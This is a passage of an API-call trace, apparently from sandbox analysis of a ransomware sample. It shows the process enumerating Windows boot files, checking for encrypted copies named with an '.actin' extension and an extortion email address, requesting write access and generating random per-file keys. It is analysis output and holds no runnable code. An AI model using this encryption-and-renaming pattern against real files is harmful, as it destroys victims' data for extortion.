dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0140.988] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=45984) returned 1 [0140.988] CloseHandle (hObject=0x2f0) returned 1 [0140.989] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\memtest.exe.mui" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui")) returned 0x20 [0140.989] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.989] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\memtest.exe.mui" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.989] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.989] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\qps-ploc\\bootmgr.exe.mui" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0140.989] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=74080) returned 1 [0140.989] CloseHandle (hObject=0x2f0) returned 1 [0140.989] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\qps-ploc\\bootmgr.exe.mui" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui")) returned 0x20 [0140.989] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\qps-ploc\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.989] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\qps-ploc\\bootmgr.exe.mui" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.989] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.989] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\qps-ploc\\memtest.exe.mui" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0140.990] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=54168) returned 1 [0140.990] CloseHandle (hObject=0x2f0) returned 1 [0140.990] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\qps-ploc\\memtest.exe.mui" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui")) returned 0x20 [0140.990] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\qps-ploc\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.990] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\qps-ploc\\memtest.exe.mui" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.990] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.990] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Resources\\bootres.dll" (normalized: "c:\\boot\\resources\\bootres.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0140.990] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=92576) returned 1 [0140.990] CloseHandle (hObject=0x2f0) returned 1 [0140.990] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Resources\\bootres.dll" (normalized: "c:\\boot\\resources\\bootres.dll")) returned 0x20 [0140.990] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Resources\\bootres.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\resources\\bootres.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.990] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Resources\\bootres.dll" (normalized: "c:\\boot\\resources\\bootres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.991] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.991] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Resources\\en-US\\bootres.dll.mui" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0140.991] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=12192) returned 1 [0140.991] CloseHandle (hObject=0x2f0) returned 1 [0140.991] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Resources\\en-US\\bootres.dll.mui" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui")) returned 0x20 [0140.991] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Resources\\en-US\\bootres.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.991] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Resources\\en-US\\bootres.dll.mui" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.991] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.991] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ro-RO\\bootmgr.exe.mui" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0140.991] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=76128) returned 1 [0140.992] CloseHandle (hObject=0x2f0) returned 1 [0140.992] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ro-RO\\bootmgr.exe.mui" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui")) returned 0x20 [0140.992] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ro-RO\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.992] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ro-RO\\bootmgr.exe.mui" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.992] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.992] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0140.992] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=77152) returned 1 [0140.992] CloseHandle (hObject=0x2f0) returned 1 [0140.992] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui")) returned 0x20 [0140.992] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.992] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.993] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.993] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\memtest.exe.mui" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0140.993] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=44960) returned 1 [0140.993] CloseHandle (hObject=0x2f0) returned 1 [0140.993] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\memtest.exe.mui" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui")) returned 0x20 [0140.993] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.993] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\memtest.exe.mui" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.993] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.993] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sk-SK\\bootmgr.exe.mui" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0140.993] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=77144) returned 1 [0140.993] CloseHandle (hObject=0x2f0) returned 1 [0140.993] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sk-SK\\bootmgr.exe.mui" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui")) returned 0x20 [0140.994] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sk-SK\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.994] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sk-SK\\bootmgr.exe.mui" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.994] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.994] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sl-SI\\bootmgr.exe.mui" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0140.994] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=76640) returned 1 [0140.994] CloseHandle (hObject=0x2f0) returned 1 [0140.994] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sl-SI\\bootmgr.exe.mui" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui")) returned 0x20 [0140.994] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sl-SI\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.994] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sl-SI\\bootmgr.exe.mui" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.994] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.994] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0140.995] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=77152) returned 1 [0140.995] CloseHandle (hObject=0x2f0) returned 1 [0140.995] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui")) returned 0x20 [0140.995] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.995] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.995] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.995] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sr-Latn-CS\\memtest.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0140.995] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=44888) returned 1 [0140.995] CloseHandle (hObject=0x2f0) returned 1 [0140.995] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sr-Latn-CS\\memtest.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui")) returned 0x20 [0140.995] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sr-Latn-CS\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.996] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sr-Latn-CS\\memtest.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.996] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.996] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0140.996] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=77152) returned 1 [0140.996] CloseHandle (hObject=0x2f0) returned 1 [0140.996] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui")) returned 0x20 [0140.996] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.996] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.996] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.996] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0140.997] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=76128) returned 1 [0140.997] CloseHandle (hObject=0x2f0) returned 1 [0140.997] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui")) returned 0x20 [0140.997] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.997] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.997] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.997] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\memtest.exe.mui" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0140.997] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=44952) returned 1 [0140.997] CloseHandle (hObject=0x2f0) returned 1 [0140.997] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\memtest.exe.mui" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui")) returned 0x20 [0140.997] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.998] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\memtest.exe.mui" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.998] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.998] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0140.998] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=75096) returned 1 [0140.998] CloseHandle (hObject=0x2f0) returned 1 [0140.998] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui")) returned 0x20 [0140.998] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.998] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.998] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.998] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\memtest.exe.mui" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0140.999] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=45472) returned 1 [0140.999] CloseHandle (hObject=0x2f0) returned 1 [0140.999] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\memtest.exe.mui" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui")) returned 0x20 [0140.999] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.999] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\memtest.exe.mui" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.999] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0140.999] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\uk-UA\\bootmgr.exe.mui" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0140.999] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=77152) returned 1 [0140.999] CloseHandle (hObject=0x2f0) returned 1 [0140.999] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\uk-UA\\bootmgr.exe.mui" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui")) returned 0x20 [0140.999] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\uk-UA\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.999] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\uk-UA\\bootmgr.exe.mui" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.999] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0141.000] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\updaterevokesipolicy.p7b" (normalized: "c:\\boot\\updaterevokesipolicy.p7b"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0141.000] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=4662) returned 1 [0141.000] CloseHandle (hObject=0x2f0) returned 1 [0141.000] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\updaterevokesipolicy.p7b" (normalized: "c:\\boot\\updaterevokesipolicy.p7b")) returned 0x20 [0141.001] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\updaterevokesipolicy.p7b.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\updaterevokesipolicy.p7b.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0141.001] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\updaterevokesipolicy.p7b" (normalized: "c:\\boot\\updaterevokesipolicy.p7b"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0141.001] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0141.001] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0141.001] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=63840) returned 1 [0141.001] CloseHandle (hObject=0x2f0) returned 1 [0141.001] GetFileAttributesW 